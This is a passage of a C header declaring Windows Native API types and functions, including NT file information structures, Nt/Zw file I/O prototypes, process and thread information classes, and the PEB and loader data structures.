1949 |     LARGE_INTEGER StreamAllocationSize;
1950 |     WCHAR StreamName[1];
1951 | } FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;
1952 | 
1953 | typedef struct _FILE_PIPE_INFORMATION {
1954 |      ULONG ReadMode;
1955 |      ULONG CompletionMode;
1956 | } FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;
1957 | 
1958 | 
1959 | typedef struct _FILE_PIPE_LOCAL_INFORMATION {
1960 |      ULONG NamedPipeType;
1961 |      ULONG NamedPipeConfiguration;
1962 |      ULONG MaximumInstances;
1963 |      ULONG CurrentInstances;
1964 |      ULONG InboundQuota;
1965 |      ULONG ReadDataAvailable;
1966 |      ULONG OutboundQuota;
1967 |      ULONG WriteQuotaAvailable;
1968 |      ULONG NamedPipeState;
1969 |      ULONG NamedPipeEnd;
1970 | } FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;
1971 | 
1972 | 
1973 | typedef struct _FILE_PIPE_REMOTE_INFORMATION {
1974 |      LARGE_INTEGER CollectDataTime;
1975 |      ULONG MaximumCollectionCount;
1976 | } FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;
1977 | 
1978 | 
1979 | typedef struct _FILE_MAILSLOT_QUERY_INFORMATION {
1980 |     ULONG MaximumMessageSize;
1981 |     ULONG MailslotQuota;
1982 |     ULONG NextMessageSize;
1983 |     ULONG MessagesAvailable;
1984 |     LARGE_INTEGER ReadTimeout;
1985 | } FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;
1986 | 
1987 | 
1988 | typedef struct _FILE_MAILSLOT_SET_INFORMATION {
1989 |     PLARGE_INTEGER ReadTimeout;
1990 | } FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;
1991 | 
1992 | 
1993 | typedef struct _FILE_COMPRESSION_INFORMATION {
1994 |     LARGE_INTEGER CompressedFileSize;
1995 |     USHORT CompressionFormat;
1996 |     UCHAR CompressionUnitShift;
1997 |     UCHAR ChunkShift;
1998 |     UCHAR ClusterShift;
1999 |     UCHAR Reserved[3];
2000 | } FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;
2001 | 
2002 | 
2003 | typedef struct _FILE_LINK_INFORMATION {
2004 |     BOOLEAN ReplaceIfExists;
2005 |     HANDLE RootDirectory;
2006 |     ULONG FileNameLength;
2007 |     WCHAR FileName[1];
2008 | } FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
2009 | 
2010 | 
2011 | typedef struct _FILE_OBJECTID_INFORMATION
2012 | {
2013 |     LONGLONG FileReference;
2014 |     UCHAR ObjectId[16];
2015 |     union {
2016 |         struct {
2017 |             UCHAR BirthVolumeId[16];
2018 |             UCHAR BirthObjectId[16];
2019 |             UCHAR DomainId[16];
2020 |         } ;
2021 |         UCHAR ExtendedInfo[48];
2022 |     };
2023 | } FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;
2024 | 
2025 | 
2026 | typedef struct _FILE_COMPLETION_INFORMATION {
2027 |     HANDLE Port;
2028 |     PVOID Key;
2029 | } FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;
2030 | 
2031 | 
2032 | typedef struct _FILE_MOVE_CLUSTER_INFORMATION {
2033 |     ULONG ClusterCount;
2034 |     HANDLE RootDirectory;
2035 |     ULONG FileNameLength;
2036 |     WCHAR FileName[1];
2037 | } FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;
2038 | 
2039 | 
2040 | typedef struct _FILE_NETWORK_OPEN_INFORMATION {
2041 |     LARGE_INTEGER CreationTime;
2042 |     LARGE_INTEGER LastAccessTime;
2043 |     LARGE_INTEGER LastWriteTime;
2044 |     LARGE_INTEGER ChangeTime;
2045 |     LARGE_INTEGER AllocationSize;
2046 |     LARGE_INTEGER EndOfFile;
2047 |     ULONG FileAttributes;
2048 | } FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
2049 | 
2050 | 
2051 | typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
2052 |     ULONG FileAttributes;
2053 |     ULONG ReparseTag;
2054 | } FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;
2055 | 
2056 | 
2057 | typedef struct _FILE_TRACKING_INFORMATION {
2058 |     HANDLE DestinationFile;
2059 |     ULONG ObjectInformationLength;
2060 |     CHAR ObjectInformation[1];
2061 | } FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;
2062 | 
2063 | 
2064 | typedef struct _FILE_REPARSE_POINT_INFORMATION {
2065 |     LONGLONG FileReference;
2066 |     ULONG Tag;
2067 | } FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;
2068 | 
2069 | 
2070 | typedef struct _FILE_QUOTA_INFORMATION {
2071 |     ULONG NextEntryOffset;
2072 |     ULONG SidLength;
2073 |     LARGE_INTEGER ChangeTime;
2074 |     LARGE_INTEGER QuotaUsed;
2075 |     LARGE_INTEGER QuotaThreshold;
2076 |     LARGE_INTEGER QuotaLimit;
2077 |     SID Sid;
2078 | } FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;
2079 | 
2080 | 
2081 | typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
2082 |     ULONG NextEntryOffset;
2083 |     ULONG FileIndex;
2084 |     LARGE_INTEGER CreationTime;
2085 |     LARGE_INTEGER LastAccessTime;
2086 |     LARGE_INTEGER LastWriteTime;
2087 |     LARGE_INTEGER ChangeTime;
2088 |     LARGE_INTEGER EndOfFile;
2089 |     LARGE_INTEGER AllocationSize;
2090 |     ULONG FileAttributes;
2091 |     ULONG FileNameLength;
2092 |     ULONG EaSize;
2093 |     CCHAR ShortNameLength;
2094 |     WCHAR ShortName[12];
2095 |     LARGE_INTEGER FileId;
2096 |     WCHAR FileName[1];
2097 | } FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;
2098 | 
2099 | 
2100 | typedef struct _FILE_ID_FULL_DIR_INFORMATION {
2101 |     ULONG NextEntryOffset;
2102 |     ULONG FileIndex;
2103 |     LARGE_INTEGER CreationTime;
2104 |     LARGE_INTEGER LastAccessTime;
2105 |     LARGE_INTEGER LastWriteTime;
2106 |     LARGE_INTEGER ChangeTime;
2107 |     LARGE_INTEGER EndOfFile;
2108 |     LARGE_INTEGER AllocationSize;
2109 |     ULONG FileAttributes;
2110 |     ULONG FileNameLength;
2111 |     ULONG EaSize;
2112 |     LARGE_INTEGER FileId;
2113 |     WCHAR FileName[1];
2114 | } FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;
2115 | 
2116 | 
2117 | typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
2118 |     LARGE_INTEGER ValidDataLength;
2119 | } FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;
2120 | 
2121 | typedef struct _FILE_LINK_ENTRY_INFORMATION {
2122 |     ULONG NextEntryOffset;
2123 |     LONGLONG ParentFileId;
2124 |     ULONG FileNameLength;
2125 |     WCHAR FileName[1];
2126 | } FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION;
2127 | 
2128 | typedef struct _FILE_LINKS_INFORMATION {
2129 |     ULONG BytesNeeded;
2130 |     ULONG EntriesReturned;
2131 |     FILE_LINK_ENTRY_INFORMATION Entry;
2132 | } FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION;
2133 | 
2134 | 
2135 | 
2136 | typedef enum _FSINFOCLASS {
2137 |     FileFsVolumeInformation       = 1,
2138 |     FileFsLabelInformation,      // 2
2139 |     FileFsSizeInformation,       // 3
2140 |     FileFsDeviceInformation,     // 4
2141 |     FileFsAttributeInformation,  // 5
2142 |     FileFsControlInformation,    // 6
2143 |     FileFsFullSizeInformation,   // 7
2144 |     FileFsObjectIdInformation,   // 8
2145 |     FileFsDriverPathInformation, // 9
2146 |     FileFsMaximumInformation
2147 | } FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;
2148 | 
2149 | 
2150 | NTSYSAPI
2151 | NTSTATUS
2152 | NTAPI
2153 | NtCreateFile(
2154 |     OUT PHANDLE FileHandle,
2155 |     IN  ACCESS_MASK DesiredAccess,
2156 |     IN  POBJECT_ATTRIBUTES ObjectAttributes,
2157 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2158 |     IN  PLARGE_INTEGER AllocationSize,
2159 |     IN  ULONG FileAttributes,
2160 |     IN  ULONG ShareAccess,
2161 |     IN  ULONG CreateDisposition,
2162 |     IN  ULONG CreateOptions,
2163 |     IN  PVOID EaBuffer,
2164 |     IN  ULONG EaLength);
2165 | 
2166 | 
2167 | NTSYSAPI
2168 | NTSTATUS
2169 | NTAPI
2170 | ZwCreateFile(
2171 |     OUT PHANDLE FileHandle,
2172 |     IN  ACCESS_MASK DesiredAccess,
2173 |     IN  POBJECT_ATTRIBUTES ObjectAttributes,
2174 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2175 |     IN  PLARGE_INTEGER AllocationSize,
2176 |     IN  ULONG FileAttributes,
2177 |     IN  ULONG ShareAccess,
2178 |     IN  ULONG CreateDisposition,
2179 |     IN  ULONG CreateOptions,
2180 |     IN  PVOID EaBuffer,
2181 |     IN  ULONG EaLength);
2182 | 
2183 | 
2184 | NTSYSAPI
2185 | NTSTATUS
2186 | NTAPI
2187 | NtOpenFile(
2188 |     OUT PHANDLE FileHandle,
2189 |     IN ACCESS_MASK DesiredAccess,
2190 |     IN POBJECT_ATTRIBUTES ObjectAttributes,
2191 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2192 |     IN ULONG ShareAccess,
2193 |     IN ULONG OpenOptions
2194 |     );
2195 | 
2196 | 
2197 | NTSYSAPI
2198 | NTSTATUS
2199 | NTAPI
2200 | ZwOpenFile(
2201 |     OUT PHANDLE FileHandle,
2202 |     IN ACCESS_MASK DesiredAccess,
2203 |     IN POBJECT_ATTRIBUTES ObjectAttributes,
2204 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2205 |     IN ULONG ShareAccess,
2206 |     IN ULONG OpenOptions
2207 |     );
2208 | 
2209 | 
2210 | NTSYSAPI
2211 | NTSTATUS
2212 | NTAPI
2213 | NtQueryInformationFile(
2214 |     IN HANDLE FileHandle,
2215 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2216 |     OUT PVOID FileInformation,
2217 |     IN ULONG Length,
2218 |     IN FILE_INFORMATION_CLASS FileInformationClass
2219 |     );
2220 | 
2221 | 
2222 | NTSYSAPI
2223 | NTSTATUS
2224 | NTAPI
2225 | ZwQueryInformationFile(
2226 |     IN HANDLE FileHandle,
2227 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2228 |     OUT PVOID FileInformation,
2229 |     IN ULONG Length,
2230 |     IN FILE_INFORMATION_CLASS FileInformationClass
2231 |     );
2232 | 
2233 | 
2234 | NTSYSAPI
2235 | NTSTATUS
2236 | NTAPI
2237 | NtQueryDirectoryFile(
2238 |     IN HANDLE FileHandle,
2239 |     IN HANDLE Event OPTIONAL,
2240 |     IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
2241 |     IN PVOID ApcContext OPTIONAL,
2242 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2243 |     OUT PVOID FileInformation,
2244 |     IN ULONG Length,
2245 |     IN FILE_INFORMATION_CLASS FileInformationClass,
2246 |     IN BOOLEAN ReturnSingleEntry,
2247 |     IN PUNICODE_STRING FileName OPTIONAL,
2248 |     IN BOOLEAN RestartScan
2249 |     );
2250 | 
2251 | 
2252 | NTSYSAPI
2253 | NTSTATUS
2254 | NTAPI
2255 | ZwQueryDirectoryFile(
2256 |     IN HANDLE FileHandle,
2257 |     IN HANDLE Event OPTIONAL,
2258 |     IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
2259 |     IN PVOID ApcContext OPTIONAL,
2260 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2261 |     OUT PVOID FileInformation,
2262 |     IN ULONG Length,
2263 |     IN FILE_INFORMATION_CLASS FileInformationClass,
2264 |     IN BOOLEAN ReturnSingleEntry,
2265 |     IN PUNICODE_STRING FileName OPTIONAL,
2266 |     IN BOOLEAN RestartScan
2267 |     );
2268 | 
2269 | 
2270 | NTSYSAPI
2271 | NTSTATUS
2272 | NTAPI
2273 | NtQueryVolumeInformationFile(
2274 |     IN HANDLE FileHandle,
2275 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2276 |     OUT PVOID FsInformation,
2277 |     IN ULONG Length,
2278 |     IN FS_INFORMATION_CLASS FsInformationClass
2279 |     );
2280 | 
2281 | 
2282 | NTSYSAPI
2283 | NTSTATUS
2284 | NTAPI
2285 | ZwQueryVolumeInformationFile(
2286 |     IN HANDLE FileHandle,
2287 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2288 |     OUT PVOID FsInformation,
2289 |     IN ULONG Length,
2290 |     IN FS_INFORMATION_CLASS FsInformationClass
2291 |     );
2292 | 
2293 | 
2294 | NTSYSAPI
2295 | NTSTATUS
2296 | NTAPI
2297 | NtSetInformationFile(
2298 |     IN HANDLE FileHandle,
2299 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2300 |     IN PVOID FileInformation,
2301 |     IN ULONG Length,
2302 |     IN FILE_INFORMATION_CLASS FileInformationClass
2303 |     );
2304 | 
2305 | 
2306 | NTSYSAPI
2307 | NTSTATUS
2308 | NTAPI
2309 | ZwSetInformationFile(
2310 |     IN HANDLE FileHandle,
2311 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2312 |     IN PVOID FileInformation,
2313 |     IN ULONG Length,
2314 |     IN FILE_INFORMATION_CLASS FileInformationClass
2315 |     );
2316 | 
2317 | 
2318 | NTSYSAPI
2319 | NTSTATUS
2320 | NTAPI
2321 | NtQueryEaFile(
2322 |     IN  HANDLE FileHandle,
2323 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2324 |     OUT PVOID Buffer,
2325 |     IN  ULONG Length,
2326 |     IN  BOOLEAN ReturnSingleEntry,
2327 |     IN  PVOID EaList OPTIONAL,
2328 |     IN  ULONG EaListLength,
2329 |     IN  PULONG EaIndex OPTIONAL,
2330 |     IN  BOOLEAN RestartScan);
2331 | 
2332 | 
2333 | NTSYSAPI
2334 | NTSTATUS
2335 | NTAPI
2336 | ZwQueryEaFile(
2337 |     IN  HANDLE FileHandle,
2338 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2339 |     OUT PVOID Buffer,
2340 |     IN  ULONG Length,
2341 |     IN  BOOLEAN ReturnSingleEntry,
2342 |     IN  PVOID EaList OPTIONAL,
2343 |     IN  ULONG EaListLength,
2344 |     IN  PULONG EaIndex OPTIONAL,
2345 |     IN  BOOLEAN RestartScan);
2346 | 
2347 | 
2348 | NTSYSAPI
2349 | NTSTATUS
2350 | NTAPI
2351 | NtSetEaFile(
2352 |     IN  HANDLE FileHandle,
2353 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2354 |     IN  PVOID Buffer,
2355 |     IN  ULONG Length);
2356 | 
2357 | 
2358 | NTSYSAPI
2359 | NTSTATUS
2360 | NTAPI
2361 | ZwSetEaFile(
2362 |     IN  HANDLE FileHandle,
2363 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2364 |     IN  PVOID Buffer,
2365 |     IN  ULONG Length);
2366 | 
2367 | 
2368 | NTSYSAPI
2369 | NTSTATUS
2370 | NTAPI
2371 | NtReadFile(
2372 |     IN HANDLE FileHandle,
2373 |     IN HANDLE Event OPTIONAL,
2374 |     IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
2375 |     IN PVOID ApcContext OPTIONAL,
2376 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2377 |     OUT PVOID Buffer,
2378 |     IN ULONG Length,
2379 |     IN PLARGE_INTEGER ByteOffset OPTIONAL,
2380 |     IN PULONG Key OPTIONAL
2381 |     );
2382 | 
2383 | 
2384 | NTSYSAPI
2385 | NTSTATUS
2386 | NTAPI
2387 | ZwReadFile(
2388 |     IN HANDLE FileHandle,
2389 |     IN HANDLE Event OPTIONAL,
2390 |     IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
2391 |     IN PVOID ApcContext OPTIONAL,
2392 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2393 |     OUT PVOID Buffer,
2394 |     IN ULONG Length,
2395 |     IN PLARGE_INTEGER ByteOffset OPTIONAL,
2396 |     IN PULONG Key OPTIONAL
2397 |     );
2398 | 
2399 | 
2400 | NTSYSAPI
2401 | NTSTATUS
2402 | NTAPI
2403 | NtWriteFile(
2404 |     IN HANDLE FileHandle,
2405 |     IN HANDLE Event OPTIONAL,
2406 |     IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
2407 |     IN PVOID ApcContext OPTIONAL,
2408 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2409 |     IN PVOID Buffer,
2410 |     IN ULONG Length,
2411 |     IN PLARGE_INTEGER ByteOffset OPTIONAL,
2412 |     IN PULONG Key OPTIONAL
2413 |     );
2414 | 
2415 | 
2416 | NTSYSAPI
2417 | NTSTATUS
2418 | NTAPI
2419 | ZwWriteFile(
2420 |     IN HANDLE FileHandle,
2421 |     IN HANDLE Event OPTIONAL,
2422 |     IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
2423 |     IN PVOID ApcContext OPTIONAL,
2424 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2425 |     IN PVOID Buffer,
2426 |     IN ULONG Length,
2427 |     IN PLARGE_INTEGER ByteOffset OPTIONAL,
2428 |     IN PULONG Key OPTIONAL
2429 |     );
2430 | 
2431 | 
2432 | NTSYSAPI
2433 | NTSTATUS
2434 | NTAPI
2435 | NtDeleteFile(
2436 |     IN POBJECT_ATTRIBUTES ObjectAttributes
2437 |     );
2438 | 
2439 | 
2440 | NTSYSAPI
2441 | NTSTATUS
2442 | NTAPI
2443 | ZwDeleteFile(
2444 |     IN POBJECT_ATTRIBUTES ObjectAttributes
2445 |     );
2446 | 
2447 | 
2448 | NTSYSAPI
2449 | NTSTATUS
2450 | NTAPI
2451 | NtFlushBuffersFile(
2452 |     IN HANDLE FileHandle,
2453 |     OUT PIO_STATUS_BLOCK IoStatusBlock
2454 |     );
2455 | 
2456 | 
2457 | NTSYSAPI
2458 | NTSTATUS
2459 | NTAPI
2460 | ZwFlushBuffersFile(
2461 |     IN HANDLE FileHandle,
2462 |     OUT PIO_STATUS_BLOCK IoStatusBlock
2463 |     );
2464 | 
2465 | 
2466 | NTSYSAPI
2467 | NTSTATUS
2468 | NTAPI
2469 | NtDeviceIoControlFile(
2470 |     IN  HANDLE FileHandle,
2471 |     IN  HANDLE Event,
2472 |     IN  PIO_APC_ROUTINE ApcRoutine,
2473 |     IN  PVOID ApcContext,
2474 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2475 |     IN  ULONG IoControlCode,
2476 |     IN  PVOID InputBuffer,
2477 |     IN  ULONG InputBufferLength,
2478 |     IN  PVOID OutputBuffer,
2479 |     IN  ULONG OutputBufferLength
2480 |     );
2481 | 
2482 | 
2483 | NTSYSAPI
2484 | NTSTATUS
2485 | NTAPI
2486 | ZwDeviceIoControlFile(
2487 |     IN  HANDLE FileHandle,
2488 |     IN  HANDLE Event,
2489 |     IN  PIO_APC_ROUTINE ApcRoutine,
2490 |     IN  PVOID ApcContext,
2491 |     OUT PIO_STATUS_BLOCK IoStatusBlock,
2492 |     IN  ULONG IoControlCode,
2493 |     IN  PVOID InputBuffer,
2494 |     IN  ULONG InputBufferLength,
2495 |     IN  PVOID OutputBuffer,
2496 |     IN  ULONG OutputBufferLength
2497 |     );
2498 | 
2499 | 
2500 | NTSYSAPI
2501 | NTSTATUS
2502 | NTAPI
2503 | NtCancelIoFile(
2504 |     IN HANDLE Filehandle,
2505 |     OUT PIO_STATUS_BLOCK IoStatusBlock
2506 |     );
2507 | 
2508 | 
2509 | NTSYSAPI
2510 | NTSTATUS
2511 | NTAPI
2512 | ZwCancelIoFile(
2513 |     IN HANDLE Filehandle,
2514 |     OUT PIO_STATUS_BLOCK IoStatusBlock
2515 |     );
2516 | 
2517 | 
2518 | NTSYSAPI
2519 | BOOLEAN
2520 | NTAPI
2521 | RtlDosPathNameToNtPathName_U (
2522 |     IN  PWSTR DosPathName,
2523 |     OUT PUNICODE_STRING NtPathName,
2524 |     OUT PWSTR * NtFileNamePart OPTIONAL,
2525 |     OUT PCURDIR DirectoryInfo OPTIONAL
2526 |     );
2527 | 
2528 | 
2529 | //-----------------------------------------------------------------------------
2530 | // Process functions
2531 | 
2532 | #define GDI_HANDLE_BUFFER_SIZE      34
2533 | 
2534 | //
2535 | // Process Information Classes
2536 | //
2537 | 
2538 | typedef enum _PROCESSINFOCLASS {
2539 |     ProcessBasicInformation,
2540 |     ProcessQuotaLimits,
2541 |     ProcessIoCounters,
2542 |     ProcessVmCounters,
2543 |     ProcessTimes,
2544 |     ProcessBasePriority,
2545 |     ProcessRaisePriority,
2546 |     ProcessDebugPort,
2547 |     ProcessExceptionPort,
2548 |     ProcessAccessToken,
2549 |     ProcessLdtInformation,
2550 |     ProcessLdtSize,
2551 |     ProcessDefaultHardErrorMode,
2552 |     ProcessIoPortHandlers,          // Note: this is kernel mode only
2553 |     ProcessPooledUsageAndLimits,
2554 |     ProcessWorkingSetWatch,
2555 |     ProcessUserModeIOPL,
2556 |     ProcessEnableAlignmentFaultFixup,
2557 |     ProcessPriorityClass,
2558 |     ProcessWx86Information,
2559 |     ProcessHandleCount,
2560 |     ProcessAffinityMask,
2561 |     ProcessPriorityBoost,
2562 |     ProcessDeviceMap,
2563 |     ProcessSessionInformation,
2564 |     ProcessForegroundInformation,
2565 |     ProcessWow64Information,
2566 |     ProcessImageFileName,
2567 |     ProcessLUIDDeviceMapsEnabled,
2568 |     ProcessBreakOnTermination,
2569 |     ProcessDebugObjectHandle,
2570 |     ProcessDebugFlags,
2571 |     ProcessHandleTracing,
2572 |     MaxProcessInfoClass                             // MaxProcessInfoClass should always be the last enum
2573 | } PROCESSINFOCLASS;
2574 | 
2575 | //
2576 | // Thread Information Classes
2577 | //
2578 | 
2579 | typedef enum _THREADINFOCLASS {
2580 |     ThreadBasicInformation,                            // ??
2581 |     ThreadTimes,
2582 |     ThreadPriority,                                    // ??
2583 |     ThreadBasePriority,                                // ??
2584 |     ThreadAffinityMask,                                // ??
2585 |     ThreadImpersonationToken,                        // HANDLE
2586 |     ThreadDescriptorTableEntry,                        // ULONG Selector + LDT_ENTRY
2587 |     ThreadEnableAlignmentFaultFixup,                // ??
2588 |     ThreadEventPair,                                // ??
2589 |     ThreadQuerySetWin32StartAddress,                // ??
2590 |     ThreadZeroTlsCell,                                // ??
2591 |     ThreadPerformanceCount,                            // ??
2592 |     ThreadAmILastThread,                            // ??
2593 |     ThreadIdealProcessor,                            // ??
2594 |     ThreadPriorityBoost,                            // ??
2595 |     ThreadSetTlsArrayAddress,                        // ??
2596 |     MaxThreadInfoClass
2597 | } THREADINFOCLASS;
2598 | 
2599 | 
2600 | typedef struct _RTL_DRIVE_LETTER_CURDIR
2601 | {
2602 |     USHORT Flags;
2603 |     USHORT Length;
2604 |     ULONG  TimeStamp;
2605 |     STRING DosPath;
2606 | 
2607 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
2608 | 
2609 | 
2610 | typedef struct _RTL_USER_PROCESS_PARAMETERS
2611 | {
2612 |     ULONG MaximumLength;                            // Should be set before call RtlCreateProcessParameters
2613 |     ULONG Length;                                   // Length of valid structure
2614 |     ULONG Flags;                                    // Currently only PPF_NORMALIZED (1) is known:
2615 |                                                     //  - Means that structure is normalized by call RtlNormalizeProcessParameters
2616 |     ULONG DebugFlags;
2617 | 
2618 |     PVOID ConsoleHandle;                            // HWND to console window associated with process (if any).
2619 |     ULONG ConsoleFlags;
2620 |     HANDLE StandardInput;
2621 |     HANDLE StandardOutput;
2622 |     HANDLE StandardError;
2623 | 
2624 |     CURDIR CurrentDirectory;                        // Specified in DOS-like symbolic link path, ex: "C:/WinNT/SYSTEM32"
2625 |     UNICODE_STRING DllPath;                         // DOS-like paths separated by ';' where system should search for DLL files.
2626 |     UNICODE_STRING ImagePathName;                   // Full path in DOS-like format to process'es file image.
2627 |     UNICODE_STRING CommandLine;                     // Command line
2628 |     PVOID Environment;                              // Pointer to environment block (see RtlCreateEnvironment)
2629 |     ULONG StartingX;
2630 |     ULONG StartingY;
2631 |     ULONG CountX;
2632 |     ULONG CountY;
2633 |     ULONG CountCharsX;
2634 |     ULONG CountCharsY;
2635 |     ULONG FillAttribute;                            // Fill attribute for console window
2636 |     ULONG WindowFlags;
2637 |     ULONG ShowWindowFlags;
2638 |     UNICODE_STRING WindowTitle;
2639 |     UNICODE_STRING DesktopInfo;                     // Name of WindowStation and Desktop objects, where process is assigned
2640 |     UNICODE_STRING ShellInfo;
2641 |     UNICODE_STRING RuntimeData;
2642 |     RTL_DRIVE_LETTER_CURDIR CurrentDirectores[0x20];
2643 |     ULONG EnvironmentSize;
2644 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
2645 | 
2646 | //
2647 | // Process Environment Block
2648 | //
2649 | 
2650 | typedef struct _PEB_FREE_BLOCK
2651 | {
2652 |     struct _PEB_FREE_BLOCK *Next;
2653 |     ULONG Size;
2654 | 
2655 | } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
2656 | 
2657 | 
2658 | typedef struct _PEB_LDR_DATA
2659 | {
2660 |     ULONG Length;
2661 |     BOOLEAN Initialized;
2662 |     HANDLE SsHandle;
2663 |     LIST_ENTRY InLoadOrderModuleList;               // Points to the loaded modules (main EXE usually)
2664 |     LIST_ENTRY InMemoryOrderModuleList;             // Points to all modules (EXE and all DLLs)
2665 |     LIST_ENTRY InInitializationOrderModuleList;
2666 |     PVOID      EntryInProgress;
2667 | 
2668 | } PEB_LDR_DATA, *PPEB_LDR_DATA;
2669 | 
2670 | 
2671 | typedef struct _LDR_DATA_TABLE_ENTRY
2672 | {
2673 |     LIST_ENTRY InLoadOrderLinks;
2674 |     LIST_ENTRY InMemoryOrderLinks;
2675 |     LIST_ENTRY InInitializationOrderLinks;
2676 |     PVOID DllBase;                             // Base address of the module
2677 |     PVOID EntryPoint;
2678 |     ULONG SizeOfImage;
2679 |     UNICODE_STRING FullDllName;
2680 |     UNICODE_STRING BaseDllName;
2681 |     ULONG  Flags;
2682 |     USHORT LoadCount;
2683 |     USHORT TlsIndex;
2684 |     LIST_ENTRY HashLinks;
2685 |     PVOID SectionPointer;
2686 |     ULONG CheckSum;
2687 |     ULONG TimeDateStamp;
2688 |     PVOID LoadedImports;
2689 |     PVOID EntryPointActivationContext;
2690 |     PVOID PatchInformation;
2691 |     PVOID Unknown1;
2692 |     PVOID Unknown2;
2693 |     PVOID Unknown3;
2694 | 
2695 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
2696 | 
2697 | 
2698 | typedef struct _PEB
2699 | {
2700 |     BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the
2701 |     BOOLEAN ReadImageFileExecOptions;   //
2702 |     BOOLEAN BeingDebugged;              //
2703 |     BOOLEAN SpareBool;                  //
2704 |     HANDLE Mutant;                      // INITIAL_PEB structure is also updated.
2705 | 
2706 |     PVOID ImageBaseAddress;
2707 |     PPEB_LDR_DATA Ldr;
2708 |     PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
2709 |     PVOID SubSystemData;
2710 |     PVOID ProcessHeap;
2711 |     PVOID FastPebLock;
2712 |     PVOID FastPebLockRoutine;
2713 |     PVOID FastPebUnlockRoutine;
2714 |     ULONG EnvironmentUpdateCount;
2715 |     PVOID KernelCallbackTable;
2716 |     HANDLE SystemReserved;
2717 |     PVOID  AtlThunkSListPtr32;
2718 |     PPEB_FREE_BLOCK FreeList;
2719 |     ULONG TlsExpansionCounter;
2720 |     PVOID TlsBitmap;
2721 |     ULONG TlsBitmapBits[2];         // relates to TLS_MINIMUM_AVAILABLE
2722 |     PVOID ReadOnlySharedMemoryBase;
2723 |     PVOID ReadOnlySharedMemoryHeap;
2724 |     PVOID *ReadOnlyStaticServerData;
2725 |     PVOID AnsiCodePageData;
2726 |     PVOID OemCodePageData;
2727 |     PVOID UnicodeCaseTableData;
2728 | 
2729 |     //
2730 |     // Useful information for LdrpInitialize
2731 | 
2732 |     ULONG NumberOfProcessors;
2733 |     ULONG NtGlobalFlag;
2734 | 
2735 |     //
2736 |     // Passed up from MmCreatePeb from Session Manager registry key
2737 |     //
2738 | 
2739 |     LARGE_INTEGER CriticalSectionTimeout;
2740 |     ULONG HeapSegmentReserve;
2741 |     ULONG HeapSegmentCommit;
2742 |     ULONG HeapDeCommitTotalFreeThreshold;
2743 |     ULONG HeapDeCommitFreeBlockThreshold;
2744 | 
2745 |     //
2746 |     // Where heap manager keeps track of all heaps created for a process
2747 |     // Fields initialized by MmCreatePeb.  ProcessHeaps is initialized
2748 |     // to point to the first free byte after the PEB and MaximumNumberOfHeaps
2749 |     // is computed from the page size used to hold the PEB, less the fixed
2750 |     // size of this data structure.
2751 |     //
2752 | 
2753 |     ULONG NumberOfHeaps;
2754 |     ULONG MaximumNumberOfHeaps;
2755 |     PVOID *ProcessHeaps;
2756 | 
2757 |     //
2758 |     //
2759 |     PVOID GdiSharedHandleTable;
